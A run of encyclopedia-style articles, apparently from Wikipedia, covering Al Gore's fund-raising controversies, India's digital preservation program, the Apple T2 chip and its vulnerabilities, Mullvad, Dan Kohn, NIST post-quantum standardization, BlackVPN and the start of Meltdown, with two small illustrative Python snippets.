During the late 1990s, Gore strongly pushed for the passage of the Kyoto Protocol, which called for reduction in greenhouse gas emissions. Gore was opposed by the Senate, which passed unanimously (95-0) the Byrd–Hagel Resolution (S. Res. 98). Fund-raising In 1996, Gore was criticized for attending an event at the Buddhist Hsi Lai Temple in Hacienda Heights, California. In an interview on NBC's Today the following year, he stated that, "I did not know that it was a fund-raiser. I knew it was a political event, and I knew there were finance people that were going to be present, and so that alone should have told me, 'This is inappropriate and this is a mistake; don't do this.' And I take responsibility for that. It was a mistake." The temple was later implicated in a campaign donation laundering scheme. In that scheme, donations nominally from Buddhist nuns in lawful amounts had actually been donated by wealthy monastics and devotees. Robert Conrad, Jr., then head of a Justice Department task force appointed by Attorney General Janet Reno to investigate the fund-raising controversies, called on Reno in Spring 2000 to appoint an independent counsel to look into the fund-raising practices of Vice President Gore. Reno on September 3, 1997, ordered a review of Gore's fund-raising and associated statements. Based on the investigation, she judged that appointment of an independent counsel was unwarranted. Later in 1997, Gore also had to explain certain fund-raising calls he made to solicit funds for the Democratic Party for the 1996 election. In a news conference, Gore responded that, "all calls that I made were charged to the Democratic National Committee. 
I was advised there was nothing wrong with that. My counsel tells me there is no controlling legal authority that says that is any violation of any law." The phrase "no controlling legal authority" was severely criticized by some commentators, such as Charles Krauthammer, who wrote that "Whatever other legacies Al Gore leaves behind between now and retirement, he forever bequeaths this newest weasel word to the lexicon of American political corruption." On the other hand, Robert L. Weinberg argued in The Nation in 2000 that Gore actually had the U.S. Constitution in his favor on this, although he did concede that Gore's "use of the phrase was judged by many commentators to have been a political mistake of the first order" and noted that it was used often in stump speeches by George W. Bush when Bush was campaigning against Gore in that year's presidential race. Impeachment and impact Soon afterwards, Gore contended with the Lewinsky scandal, involving an affair between President Clinton and an intern, Monica Lewinsky. Gore initially defended Clinton, whom he believed to be innocent, stating, "He is the president of the country! He is my friend ... I want to ask you now, every single one of you, to join me in supporting him." After Clinton was impeached, Gore continued to defend him, stating, "I've defined my job in exactly the same way for six years now ... to do everything I can to help him be the best president possible." However, by the beginning stages of the 2000 presidential election, Gore gradually distanced himself from Clinton. Clinton was not a part of Gore's campaign, a move also signaled by the choice of Joe Lieberman as a running mate, as Lieberman had been highly critical of Clinton's conduct. Notes External links Official VP website with initiatives Albert A. Gore, Jr., 45th Vice President (1993-2001) Biography of the Honorable Al Gore Vice Presidency Presidency of Bill Clinton Gore
56030641
https://en.wikipedia.org/wiki/National%20Digital%20Preservation%20Program
National Digital Preservation Program
Anticipating rapidly changing technologies and rampant digital obsolescence, in 2008 the R & D in IT Group, Ministry of Electronics and Information Technology, Government of India, set out to evolve an Indian digital preservation initiative. In order to learn from the experience of developed nations, during March 24–25, 2009, an Indo-US Workshop on International Trends in Digital Preservation was organized by C-DAC, Pune with sponsorship from the Indo-US Science & Technology Forum, which led to more constructive developments towards the formulation of the national program. National Study Report on Digital Preservation Requirements of India During April 2010, the Ministry of Electronics and Information Technology, Government of India entrusted the responsibility of preparing the National Study Report on Digital Preservation Requirements of India to the Human-Centred Design & Computing Group, C-DAC, Pune, which was already active in the thematic area of heritage computing. The objective of this project was to present a comprehensive study of the current situation in India versus international trends in digital preservation, along with recommendations for undertaking the National Digital Preservation Program by involving all stakeholder organizations. Technical experts from around 24 organizations representing diverse domains such as e-governance, government and state archives, audio, video and film archives, cultural heritage repositories, health, science and education, insurance and banking, law, etc. were included in the national expert group. 
Major institutions represented in the expert group were the Centre for Development of Advanced Computing (C-DAC), National Informatics Centre (NIC), Unique Identity Program, National Archives of India, National Film Archive of India, Indira Gandhi National Centre for the Arts, Information and Broadcasting (Doordarshan and All India Radio), National Remote Sensing Centre (NRSC) / ISRO, Controller of Certifying Authorities (CCA), National e-Governance Division (NeGD), Life Insurance Corporation, Reserve Bank of India (RBI), National Institute of Oceanography (NIO), Indian Institute of Public Administration, Defense Scientific Information & Documentation Centre (DSIDC) and several other organizations. The expert group members were asked to submit position papers highlighting the short-term and long-term plans for digital preservation with respect to their domains. The study report was presented before the Government of India in two volumes as under: Volume I, Recommendations for National Digital Preservation Program of India; and Volume II, Position Papers by the National Expert Group Members. The report included an overview of international digital preservation projects, a study of legal imperatives (Information Technology Act 2000/2008), a study of technical challenges and standards, and the consolidated recommendations given by the national expert group for the National Digital Preservation Program. One of the key recommendations given in this report was to harmonize the Public Records Act, Right to Information Act, Indian Evidence Act, Copyright Act and other related Acts with the Information Technology Act in order to address digital preservation needs. The foresight of this recommendation has proved right, as in 2018 the Indian judiciary initiated the drafting of electronic evidence rules to be introduced under the Indian Evidence Act. 
In this context, the Joint Committee of High Court Judges visited C-DAC, Pune on 10 March 2018 to examine the technical aspects of the proposed electronic evidence rules in terms of extraction, encryption, preservation, retrieval and authentication of e-evidence in the court of law. Centre of Excellence for Digital Preservation As recommended in the national study report, during April 2011 the Centre of Excellence for Digital Preservation was launched as the flagship project under the National Digital Preservation Program, funded by the Ministry of Electronics and Information Technology, Government of India. The project was awarded to the Human-Centred Design & Computing Group, C-DAC Pune, India. The objectives of the Centre of Excellence were as under: Conduct research and development in digital preservation to produce the required tools, technologies, guidelines and best practices. Develop pilot digital preservation repositories and help nurture a network of Trustworthy Digital Repositories (National Digital Preservation Infrastructure) as a long-term goal. Define digital preservation standards by involving experts from stakeholder organizations, and consolidate and disseminate the digital preservation best practices generated through various projects under the National Digital Preservation Program, being the nodal point for pan-India digital preservation initiatives. Provide inputs to the Ministry of Electronics & Information Technology in the formation of a National Digital Preservation Policy. Spread awareness about the potential threats and risks of digital obsolescence and about digital preservation best practices. The major outcomes of this project are briefly summarised hereafter. Digital Preservation Standard and Guidelines The digital preservation standard and guidelines were developed to help local data-intensive projects prepare for highly demanding standards such as ISO 16363 for Audit and Certification of Trusted Digital Repositories. 
The standard is duly notified by the Ministry of Electronics and Information Technology, Government of India vide Notification No. 1(2)/2010-EG-II dated December 13, 2013 for all e-governance applications in India. e-Governance standard for Preservation Information Documentation (eGOV-PID) of Electronic Records The eGOV-PID provides a standard metadata dictionary and schema for automatically capturing preservation metadata in terms of cataloging information, enclosure information, provenance information, fixity information, representation information, digital signature information and access rights information immediately after an electronic record is produced by an e-governance system. It helps in producing an acceptable Submission Information Package (SIP) for an Open Archival Information System (OAIS), ISO 14721:2012. Best practices and guidelines for Production of Preservable e-Records The best practices and guidelines introduce five distinct steps of e-record management, namely e-record creation, e-record capturing, e-record keeping, e-record transfer to a trusted digital repository and e-record preservation, which need to be adopted in all e-governance projects. They also specify open source and standards-based file formats for the production of e-records. The guidelines incorporate the electronic records management practice as per ISO/TR 15489-1 and 2, Information and Documentation - Records Management. Digital Preservation Tools and Solutions It is difficult, however, to implement the digital preservation standard without the required tools and solutions. Therefore, the standard and guidelines are supported with a variety of digital preservation tools and solutions which can be given to memory institutions and record-creating organizations for long-term preservation. 
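As a rough illustration of the kind of preservation metadata eGOV-PID calls for, the sketch below assembles a minimal SIP-style record with cataloguing, fixity, representation and provenance sections. The field names and structure are hypothetical simplifications for illustration, not the normative eGOV-PID schema.

```python
import hashlib
import json
from datetime import datetime, timezone

def make_sip_metadata(record_id: str, payload: bytes) -> dict:
    """Build an illustrative SIP metadata record in the spirit of
    eGOV-PID / OAIS. All field names here are hypothetical."""
    return {
        "cataloguing": {
            "record_id": record_id,
            "captured": datetime.now(timezone.utc).isoformat(),
        },
        # Fixity lets the repository later verify the payload is unchanged.
        "fixity": {
            "algorithm": "SHA-256",
            "digest": hashlib.sha256(payload).hexdigest(),
        },
        "representation": {"format": "application/pdf"},  # assumed format
        "provenance": {"producer": "e-governance system"},  # illustrative
    }

sip = make_sip_metadata("REC-001", b"%PDF-1.7 ...")
print(json.dumps(sip["fixity"], indent=2))
```

Capturing the fixity digest at the moment the record is produced, as eGOV-PID prescribes, is what allows a repository to detect silent corruption or tampering years later.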
The project team at C-DAC Pune has developed a software framework for digital archiving named DIGITĀLAYA (डिजिटालय in Hindi), which is customizable for various domains, data types and application contexts such as e-records management and archival (a variety of born-digital records produced by organizations on a day-to-day basis); large volumes of e-governance records; audiovisual archives; and digital libraries / document archives. DIGITĀLAYA (डिजिटालय) is designed and developed as per the CCSDS Open Archival Information System (OAIS) Reference Model, ISO 14721:2012. A number of digital preservation tools were developed to help in processing digital data: e-SANGRAHAN (ई-संग्रहण), an e-acquisition tool; e-RUPĀNTAR (ई-रूपांतर), a pre-archival data processing tool; DATĀNTAR (डेटांतर), an e-records extraction tool; SUCHI SAMEKAN (सूची समेकन), a metadata importing and aggregation tool; META-PARIVARTAN (मेटा-परिवर्तन), an any-to-any metadata conversion tool; DATA HASTĀNTAR (डेटा-हस्तांतर), a data encryption and transfer tool; and a PDF/A converter tool. All the archival systems and digital preservation tools are developed in such a way that they help produce the evidence and reports required for the audit and certification of trustworthy digital repositories. Pilot Digital Repositories In order to test and demonstrate the effectiveness of the digital preservation tools, various pilot digital repositories were developed in collaboration with domain institutions such as the Indira Gandhi National Centre for the Arts, New Delhi; the National Archives of India, New Delhi; the Stamps and Registration Department, Hyderabad; and e-District. C-DAC Noida developed the pilot digital repository for e-Court in collaboration with the district courts of Delhi using e-Goshwara: e-Court Solution. 
The pilot digital repositories were selected from different domains with the following objectives: understand different data sets in terms of metadata, digital objects, file formats, authenticity, access control and the requirements of designated users; identify opportunities for the development of tools and solutions to address domain-specific requirements; involve the stakeholders in the digital preservation process; and generate proof of concept by deploying the solutions in the domain institutions. ISO 16363 Certified Trusted Digital Repository As a part of the pilot digital repositories, the National Cultural Audiovisual Archive (NCAA) at IGNCA, New Delhi was established using DIGITĀLAYA (डिजिटालय). NCAA manages around 2 petabytes of rare cultural audiovisual data. During June 2017, the Primary Trustworthy Digital Repository Authorization Body (PTAB), UK was accredited by the National Accreditation Board for Certification Bodies (NABCB), New Delhi, India. PTAB was engaged to audit the National Cultural Audiovisual Archive, and both the NCAA and C-DAC teams worked together during the audit process. Finally, NCAA was awarded certified status as a Trusted Digital Repository on 27 November 2017, as per ISO 16363. It is the first Certified Trusted Digital Repository (Certificate No. PTAB-TDRMS 0001) as per ISO 16363 in India and the world. Capacity Building for Audit and Certification The High Level 3-day Training Course on ISO 16363 for Auditors and Managers of Digital Repositories was conducted during 11–13 January 2017 at the India Habitat Centre, New Delhi, India. This training was organized as per the deliverables of the Centre of Excellence for Digital Preservation by C-DAC Pune in collaboration with the Primary Trustworthy Digital Repository Authorization Body (PTAB), UK. This initiative was helpful in formally introducing ISO 16363 and ISO 16919 through the National Accreditation Board for Certification Bodies (NABCB) for the audit and certification of Indian digital repositories. 
The first batch of potential technical auditors was trained, which included 27 participants from various stakeholder organisations. Apart from this, numerous digital preservation and DIGITĀLAYA (डिजिटालय) training sessions were organised for the staff of NAI, IGNCA and the 21 partner institutions contributing to the NCAA project. Contribution to UNESCO Standard Setting Instrument on Preservation of Digital Heritage The Principal Investigator of the Centre of Excellence for Digital Preservation, Dr. Dinesh Katre, represented India in the UNESCO International Experts Consultative Meet on Preservation and Access during June 25–26, 2014 at Warsaw, Poland, which drafted the standard setting instrument for the protection and preservation of digital heritage. The General Conference of UNESCO at its 38th session on 1 and 2 July 2015 unanimously adopted the Recommendation on Safeguarding the Memory of the World – Preservation of, and Access to, Documentary Heritage in the Digital Era (38 C/Resolutions – Annex V). Based on the experience gained from this project, the Government of India is considering creating a national policy on digital preservation which will be instrumental in establishing national digital preservation infrastructure. The digital preservation initiative stands at the crux where it is crucial to fill the gap between Digital India and the challenges posed by rampant technological obsolescence, to make it a truly sustainable vision. See also National Digital Information Infrastructure and Preservation Program (NDIIPP), USA Internet Archive, USA Wayback Machine Internet Memory Foundation Digital Curation Centre, UK Digital Preservation Coalition (DPC), UK Trustworthy Repositories Audit & Certification Big Data References Digital preservation Archival science Information technology in India
56049249
https://en.wikipedia.org/wiki/Apple%20T2
Apple T2
The Apple T2 (Apple's internal name: T8012) security chip is a system on a chip (SoC) that provides security and controller features to Apple's Intel-based Macintosh computers. It is a 64-bit ARMv8 chip and runs bridgeOS 2.0. The T2 has its own RAM and is essentially a computer of its own, running in parallel to the main computer that the user interacts with.

Design
The main application processor in the T2 is a variant of the Apple A10, a 64-bit ARMv8.1-A based CPU. It is manufactured by TSMC on their 16 nm process, like the A10. Die analysis reveals a CPU macro nearly identical to the A10's: a four-core design for the main application processor, with two large high-performance cores ("Hurricane") and two smaller efficiency cores ("Zephyr"). Analysis also reveals the same number of RAM controllers, but a much reduced GPU facility: three blocks, only a quarter the size of the A10's. The die measures 9.6 × 10.8 mm, a die size of 104 mm², about 80% of the size of the A10. As the T2 serves as a co-processor to its Intel-based host, it also contains several facilities handling a variety of functions not present in the host system's main platform. It is designed to stay active even when the main computer is in a halted low-power mode. The main application processor in the T2 runs an operating system called bridgeOS. The secondary processor in the T2 is a 32-bit ARMv7-A based CPU called the Secure Enclave Processor (SEP), which has the task of generating and storing encryption keys. It runs an operating system called "sepOS" based on the L4 microkernel. The T2 module is built as a package on package (PoP) together with its own RAM: 2 GB of LPDDR4 in the case of the iMac Pro, or 1 GB in the case of the MacBook Pro 15" early 2019. The T2 communicates with the host via a USB-attached Ethernet port.

Security features
There are numerous security features.
The SEP handles and stores encryption keys, including keys for Face ID, FileVault, the macOS Keychain and UEFI firmware passwords. It also stores the machine's unique ID (UID) and group ID (GID).
An AES crypto engine implementing AES-256, and a hardware random number generator.
A public key accelerator performing asymmetric cryptography operations such as RSA and elliptic-curve cryptography.
A storage controller for the computer's solid-state drive, providing always-on, on-the-fly encryption and decryption of data to and from it.
Controllers for the microphones, camera, ambient light sensors and Touch ID, decoupling the main operating system's access to them.
The T2 is integral in securing power-up, the boot sequence and operating system upgrades, not allowing unsigned components to interfere.

Other features
Other facilities are present that are not directly associated with security:
An image coprocessor enabling accelerated image processing and quality enhancements such as color, exposure balance, and focus for the iMac Pro's FaceTime HD camera.
A video codec enabling accelerated encoding and decoding of H.264 and H.265.
A controller for a touchscreen, implemented as the Touch Bar in portable Macintosh computers.
Speech recognition used in the "Hey Siri" feature.
Monitoring and control of the machine state, including a system diagnostics server and thermal management.
A speaker controller.

History
The Apple T2 was first released in the iMac Pro 2017. On July 12, 2018, Apple released an updated MacBook Pro that includes the T2 chip, which among other things enables the "Hey Siri" feature. On November 7, 2018, Apple released an updated Mac mini and MacBook Air with the T2 chip. On August 4, 2020, a refresh of the 5K iMac was announced, including the T2 chip. The functionality of the T2 is incorporated in the M-series Apple silicon chips to which Apple is transitioning from Intel processors.
Security vulnerabilities
In October 2019, security researchers began to theorize that the T2 might also be affected by the checkm8 bug, as it is roughly based on the 2016 A10 design. Rick Mark then ported libimobiledevice to work with the Apple T2, providing a free and open-source way to restore the T2 outside of Apple Configurator and enabling further work on the T2. On March 6, 2020, a team of engineers dubbed the T2 Development Team exploited the existing checkm8 bug in the T2 and released the hash of a dump of the secure ROM as proof of entry. The checkra1n team quickly integrated the patches required to support jailbreaking the T2. The T2 Development Team then used Apple's undocumented vendor-defined messages over USB Power Delivery to put a T2 device into Device Firmware Upgrade mode without user interaction. This compounded the issue, making it possible for any malicious device, such as a custom charging device, to jailbreak the T2 without user interaction. Later in the year, the release of the blackbird SEP vulnerability further compounded the impact of the defect by allowing arbitrary code execution in the T2's Secure Enclave Processor. This potentially affected encrypted credentials such as the FileVault keys as well as other secure Apple Keychain items. Developer Rick Mark then determined that macOS could be installed over the same iDevice recovery protocols, which later proved true of the M1 series of Apple Macs. On September 10, 2020, a public release of checkra1n was published that allowed users to jailbreak the T2. The T2 Development Team created patches to remove signature validation from files on the T2 such as the MacEFI firmware and the boot sound. Members of the T2 Development Team began answering questions in industry Slack instances.
A member of the security community from IronPeak used this data to compile an impact analysis of the defect, which was later corrected to properly attribute the original researchers. The original researchers made multiple corrections to the press coverage of the IronPeak blog. In October 2020, a hardware flaw in the chip's security features was found that might be exploited in a way that cannot be patched, using a method similar to the jailbreaking of iPhones with the A10 chip, since the T2 chip is based on the A10. Apple was notified of this vulnerability but did not respond before security researchers publicly disclosed it. It was later demonstrated that this vulnerability can allow users to implement custom Mac startup sounds.

Products that include the Apple T2
iMac Pro 2017
iMac 27-inch (mid-2020)
MacBook Pro (13-inch, 2018, Four Thunderbolt 3 ports)
MacBook Pro (15-inch, 2018)
Mac mini (2018)
MacBook Air (2018)
MacBook Pro (15-inch, 2019)
MacBook Pro (13-inch, 2019)
MacBook Pro (13-inch, early 2020)
MacBook Air (2019)
MacBook Pro (16-inch, 2019)
Mac Pro (2019)
MacBook Air (early 2020)

See also
Apple silicon, range of ARM-based processors designed by Apple for their products
Apple A10
bridgeOS

References

T2
ARM architecture
56112003
https://en.wikipedia.org/wiki/Mullvad
Mullvad
Mullvad is an open-source commercial VPN service based in Sweden. Launched in March 2009, Mullvad operates using the WireGuard and OpenVPN protocols. Mullvad accepts Bitcoin and Bitcoin Cash for subscriptions in addition to conventional payment methods. Its name is Swedish for mole.

History
Mullvad was launched in March 2009 by Amagicom AB. Mullvad began supporting connections via the OpenVPN protocol in 2009. Mullvad was an early adopter and supporter of the WireGuard protocol, announcing the availability of the new VPN protocol in March 2017 and making a "generous donation" supporting WireGuard development between July and December 2017. In October 2019, Mullvad partnered with Mozilla; Mozilla's VPN service, Mozilla VPN, uses Mullvad's WireGuard servers. In April 2020, Mullvad partnered with Malwarebytes, providing WireGuard servers for their VPN service, Malwarebytes Privacy.

Service
, Mullvad's server list showed information for 766 server locations across 37 countries (61 cities). A TechRadar review notes that "Mullvad's core service is powerful, up-to-date, and absolutely stuffed with high-end technologies." Complementing its use of the open-source OpenVPN and WireGuard protocols, Mullvad includes "industrial strength" encryption (employing AES-256-GCM), 4096-bit RSA certificates with SHA-512 for server authentication, perfect forward secrecy, "multiple layers" of DNS leak protection, IPv6 leak protection, "multiple stealth options" to help bypass government or corporate VPN blocking, and built-in support for port forwarding. Mullvad provides VPN client applications for computers running Windows, macOS and Linux. , native iOS and Android Mullvad VPN clients using the WireGuard protocol are available. iOS and Android users can also configure and use built-in VPN clients or the OpenVPN or WireGuard apps to access Mullvad's service.
Privacy
No email address or other identifying information is requested during Mullvad's registration process. Rather, a unique 16-digit account number is anonymously generated for each new user; this account number is thereafter used to log in to the Mullvad service. To help ensure the privacy of its users, Mullvad accepts the anonymous payment methods of cash, Bitcoin and Bitcoin Cash. (Payment for the service can also be made via bank wire transfer, credit card, PayPal, and Swish.) For users of its VPN service, Mullvad's no-logging policy precludes logging of: the user's IP address, the VPN IP address used, browsing activity, bandwidth, connections, session duration, timestamps, and DNS requests. The TechRadar review notes that "The end result of all this is you don't have to worry about how Mullvad handles court requests to access your usage data, because, well, there isn't any."

Reception
While Mullvad has been noted for taking a strong approach to privacy and maintaining good connection speeds, the VPN client setup and interface have been noted as being more onerous and technically involved than those of some other VPN providers, especially on some client platforms. However, a follow-up review by the same source in October 2018 notes, "Mullvad has a much improved, modern Windows client (and one for Mac, too)." A PC World review, also from October 2018, concludes, "With its commitment to privacy, anonymity (as close as you can realistically get online), and performance Mullvad remains our top recommendation for a VPN service." In November 2018, TechRadar noted Mullvad as one of five VPN providers to answer a set of trustworthiness questions posed by the Center for Democracy and Technology. In March 2019, a TechRadar review noted slightly substandard speeds. However, a more recent and more thorough TechRadar review, dated June 11, 2019, stated that "speeds are excellent."
While the latter review noted a shortcoming for mobile users in that Mullvad provided no mobile VPN client apps, mobile apps for both Android and iOS are now available. The non-profit Freedom of the Press Foundation, in their "Choosing a VPN" guide, lists Mullvad among the four VPNs that meet their recommended settings and features for VPN use as a tool for protecting online activity. The non-profit organization PrivacyTools.io has developed a comprehensive list of VPN provider criteria in order to objectively recommend VPNs. , only five VPNs had fulfilled those criteria; Mullvad is one of those five recommended VPN services.

See also
Comparison of virtual private network services

References

External links
Source code on GitHub

Internet privacy
Virtual private network services
Free and open-source software
56155763
https://en.wikipedia.org/wiki/Dan%20Kohn
Dan Kohn
Dan Kohn (November 20, 1972 – November 1, 2020) was an American serial entrepreneur and nonprofit executive who led the Linux Foundation's Public Health initiative. He was the executive director of the Cloud Native Computing Foundation (CNCF), which sustains and integrates open-source cloud software including Kubernetes and Fluentd, through 2020. The first company he founded, NetMarket, conducted the first secure commercial transaction on the web in 1994.

Early life and education
Kohn was born in Philadelphia on November 20, 1972. He studied at Phillips Exeter Academy, and graduated with a bachelor's degree from Swarthmore College in 1994.

Career

NetMarket
Kohn co-founded and was CEO of NetMarket, an online marketplace. On August 11, 1994, NetMarket sold Ten Summoner's Tales, a CD by Sting, to Phil Brandenberger of Philadelphia using a credit card over the Internet. The New York Times described this as "...the first retail transaction on the Internet using a readily available version of powerful data encryption software designed to guarantee privacy." The encryption used in the transaction was provided by the Pretty Good Privacy (PGP) program, incorporated into the X Mosaic browser.

Other work
Kohn worked as chief technology officer at Spreemo, a healthcare marketplace, and at Shopbeam, a shoppable-ads startup. Earlier, he worked as vice president at Teledesic, the satellite-based Internet provider funded by Craig McCaw and Bill Gates, and then became a general partner at Skymoon Ventures. Kohn co-authored RFC 3023, XML Media Types, which defined how XML and MIME interoperate and is the origin of the widely used +suffix convention in MIME types (as in application/atom+xml). He also contributed two chapters to The Bogleheads' Guide to Retirement Planning.

The Linux Foundation and CNCF
As executive director of CNCF, Kohn helped expand CNCF membership to include the largest public cloud and enterprise software companies.
He led the efforts to create a conformance standard for Kubernetes and a Kubernetes certified service provider program in 2017. During Kohn's tenure at CNCF, he oversaw the growth of KubeCon (the foundation's primary event) from 500 attendees in 2015 to over 12,000 at KubeCon + CloudNativeCon North America 2019 in San Diego, California. Kohn was chief operating officer of the Linux Foundation and helped launch the Linux Foundation's Core Infrastructure Initiative, a project created after Heartbleed to fund and support free and open-source software projects that are critical to the functioning of the Internet. More recently, he helped create their open source best practices badge. As general manager of LF Public Health, Kohn helped "public health authorities use open source software to fight COVID-19 and other epidemics."

Personal life
Kohn was married to climate scientist Julie Pullen. Pullen and Kohn had two sons.

Death
Kohn died of complications from colon cancer in New York City on November 1, 2020, at age 47.

References

External links
Video about the first web transaction, by Shopify, 4 minutes, 10 seconds

1972 births
2020 deaths
20th-century American businesspeople
21st-century American businesspeople
American business executives
Businesspeople from Philadelphia
Deaths from cancer in New York (state)
Deaths from colorectal cancer
Free software programmers
Open source advocates
Open source people
Phillips Exeter Academy alumni
Swarthmore College alumni
56162225
https://en.wikipedia.org/wiki/NIST%20Post-Quantum%20Cryptography%20Standardization
NIST Post-Quantum Cryptography Standardization
Post-Quantum Cryptography Standardization is a program and competition by NIST to update their standards to include post-quantum cryptography. It was announced at PQCrypto 2016. 23 signature schemes and 59 encryption/KEM schemes were submitted by the initial submission deadline at the end of 2017, of which 69 in total were deemed complete and proper and participated in the first round. Seven of these, of which 3 are signature schemes, advanced to the third round, which was announced on July 22, 2020.

Background
Academic research on the potential impact of quantum computing dates back to at least 2001. A NIST report published in April 2016 cites experts who acknowledge the possibility of quantum technology rendering the commonly used RSA algorithm insecure by 2030. As a result, a need to standardize quantum-secure cryptographic primitives was pursued. Since most symmetric primitives are relatively easy to modify in a way that makes them quantum resistant, efforts have focused on public-key cryptography, namely digital signatures and key encapsulation mechanisms. In December 2016, NIST initiated a standardization process by announcing a call for proposals. The competition is now in its third round of an expected four, where in each round some algorithms are discarded and others are studied more closely. NIST hopes to publish the standardization documents by 2024, but may speed up the process if major breakthroughs in quantum computing are made. It is currently undecided whether the future standards will be published as FIPS or as NIST Special Publications (SP).

Round one
Under consideration were: (strikethrough means it had been withdrawn)

Round one submissions with published attacks
Guess Again by Lorenz Panny
RVB by Lorenz Panny
RaCoSS by Daniel J. Bernstein, Andreas Hülsing, Tanja Lange and Lorenz Panny
HK17 by Daniel J. Bernstein and Tanja Lange
SRTPI by Bo-Yin Yang
WalnutDSA by Ward Beullens and Simon R. Blackburn
 by Matvei Kotov, Anton Menshov and Alexander Ushakov
DRS by Yang Yu and Léo Ducas
DAGS by Elise Barelli and Alain Couvreur
Edon-K by Matthieu Lequesne and Jean-Pierre Tillich
RLCE by Alain Couvreur, Matthieu Lequesne, and Jean-Pierre Tillich
Hila5 by Daniel J. Bernstein, Leon Groot Bruinderink, Tanja Lange and Lorenz Panny
Giophantus by Ward Beullens, Wouter Castryck and Frederik Vercauteren
RankSign by Thomas Debris-Alazard and Jean-Pierre Tillich
McNie by Philippe Gaborit; Terry Shue Chien Lau and Chik How Tan

Round two
Candidates moving on to the second round were announced on January 30, 2019.

Round three
On July 22, 2020, NIST announced seven finalists ("first track") and eight alternate algorithms ("second track"). The first track contains the algorithms which appear most promising and which will be considered for standardization at the end of the third round. Algorithms in the second track could still become part of the standard after the third round ends. NIST expects some of the alternate candidates to be considered in a fourth round. NIST also suggests it may re-open the signature category for new scheme proposals in the future. On June 7–9, 2021, NIST conducted the third PQC standardization conference, virtually. The conference included candidate updates and discussions on implementations, performance, and security issues of the candidates. A small amount of attention was given to intellectual property concerns.

Finalists

Alternate candidates

Intellectual property concerns
After NIST's announcement regarding the finalists and the alternate candidates, various intellectual property concerns were voiced, notably surrounding lattice-based schemes such as Kyber and NewHope. NIST holds signed statements from submitting groups clearing any legal claims, but there is still a concern that third parties could raise claims. NIST claims that it will take such considerations into account while picking the winning algorithms.
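Most encryption candidates in the process are key encapsulation mechanisms (KEMs), which expose a three-function interface: key generation, encapsulation (producing a ciphertext and a shared secret from a public key), and decapsulation (recovering that shared secret from the ciphertext and the private key). That interface shape can be sketched with a toy Diffie-Hellman-based KEM. Note the construction below is classical, not post-quantum, and its parameters are far too small for real use; it only illustrates the API the NIST candidates implement:

```python
import hashlib
import secrets

# Toy KEM built from classic Diffie-Hellman. Illustrates only the
# keygen/encaps/decaps interface shape -- NOT post-quantum, NOT secure.
P = 2**127 - 1  # a Mersenne prime; a real system would use far larger groups
G = 3

def keygen():
    sk = secrets.randbelow(P - 2) + 1          # private exponent
    pk = pow(G, sk, P)                         # public key g^sk mod p
    return pk, sk

def encaps(pk):
    esk = secrets.randbelow(P - 2) + 1         # ephemeral exponent
    ct = pow(G, esk, P)                        # "ciphertext" g^esk mod p
    ss = hashlib.sha256(str(pow(pk, esk, P)).encode()).digest()
    return ct, ss                              # shared secret = H(g^(sk*esk))

def decaps(sk, ct):
    # The receiver derives the same shared secret from the ciphertext.
    return hashlib.sha256(str(pow(ct, sk, P)).encode()).digest()

pk, sk = keygen()
ct, ss_sender = encaps(pk)
ss_receiver = decaps(sk, ct)
assert ss_sender == ss_receiver    # both parties now hold the same 32-byte key
```

Lattice-based finalists such as Kyber replace the modular exponentiation with hard lattice operations but present this same keygen/encaps/decaps interface.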
Adaptations
During this round, some candidates have been shown to be vulnerable to certain attack vectors, forcing these candidates to adapt accordingly:
CRYSTALS-Kyber and SABER may change the nested hashes used in their proposals in order for their security claims to hold.
FALCON is subject to a side-channel attack; a masking countermeasure may be added to resist it. This adaptation affects performance and should be considered during standardization.

See also
Advanced Encryption Standard process
CAESAR Competition – Competition to design authenticated encryption schemes
NIST hash function competition

Notes

References

External links
NIST's official website on the standardization process
Post-quantum cryptography website by djb

Cryptography standards
Cryptography contests
Post-quantum cryptography
56186856
https://en.wikipedia.org/wiki/BlackVPN
BlackVPN
BlackVPN (stylized as blackVPN) is a VPN service offered by the Hong Kong-based company BlackVPN Limited. TorrentFreak has interviewed blackVPN in its annual comparison of VPN providers since 2011. In 2014, blackVPN announced that it would begin to indefinitely donate 10 percent of every VPN Privacy Package purchase directly to the Electronic Frontier Foundation in support of The Day We Fight Back protest.

Features
BlackVPN features AES-256 encryption and DNS leak protection. The service offers apps or manual configurations for Windows, Mac, iOS, Android, Linux, and routers. The company maintains a strict no-logging policy.

Servers
As of March 2019, BlackVPN runs 31 remote servers in 20 locations and 18 countries, including Australia, Canada, Japan, the United Kingdom and the United States.

Blackmail incident
In April 2016, blackVPN claimed to have received a blackmail threat from the Armada Collective hacker group. According to blackVPN, the group threatened to perform a DDoS attack against its VPN servers on April 25 if a ransom of 10.08 bitcoins was not paid. blackVPN also stated that two other VPN service providers had received the same e-mail on April 18, and that VPN service provider AirVPN had suffered a similar threat and attack on May 30. At the time, it was unclear whether the sender of the e-mails merely imitated the group or was indeed Armada Collective. On April 25, DDoS mitigation provider Cloudflare called out the threats as fake, stating that not a single attack had been launched against a threatened organization.

Reception
In March 2016, the Dutch computer magazine Computer!Totaal (C!T) listed blackVPN as one of the nine best VPN services available. However, C!T noted the service's relatively high price and lack of its own client as potential downsides. In July 2017, Engadget author Violet Blue mentioned blackVPN as one of the "names that come up as trusted" in the VPN service industry.
See also
Comparison of virtual private network services

References

External links
BlackVPN's official website

Virtual private network services
56208586
https://en.wikipedia.org/wiki/Meltdown%20%28security%20vulnerability%29
Meltdown (security vulnerability)
Meltdown is a hardware vulnerability affecting Intel x86 microprocessors, IBM POWER processors, and some ARM-based microprocessors. It allows a rogue process to read all memory, even when it is not authorized to do so. Meltdown affects a wide range of systems. At the time of disclosure (2018), this included all devices running any but the most recent and patched versions of iOS, Linux, macOS, or Windows. Accordingly, many servers and cloud services were impacted, as well as a potential majority of smart devices and embedded devices using ARM-based processors (mobile devices, smart TVs, printers and others), including a wide range of networking equipment. A purely software workaround to Meltdown has been assessed as slowing computers between 5 and 30 percent in certain specialized workloads, although companies responsible for software correction of the exploit reported minimal impact in general benchmark testing. In January 2018, Meltdown was assigned a Common Vulnerabilities and Exposures ID; it is also known as Rogue Data Cache Load (RDCL). It was disclosed in conjunction with another exploit, Spectre, with which it shares some characteristics. The Meltdown and Spectre vulnerabilities are considered "catastrophic" by security analysts. The vulnerabilities are so severe that security researchers initially believed the reports to be false. Several procedures to help protect home computers and related devices from the Meltdown and Spectre security vulnerabilities have been published. Meltdown patches may produce performance loss. Spectre patches have been reported to significantly reduce performance, especially on older computers; on the newer eighth-generation Core platforms, benchmark performance drops of 2–14 percent have been measured. On 18 January 2018, unwanted reboots, even for newer Intel chips, due to Meltdown and Spectre 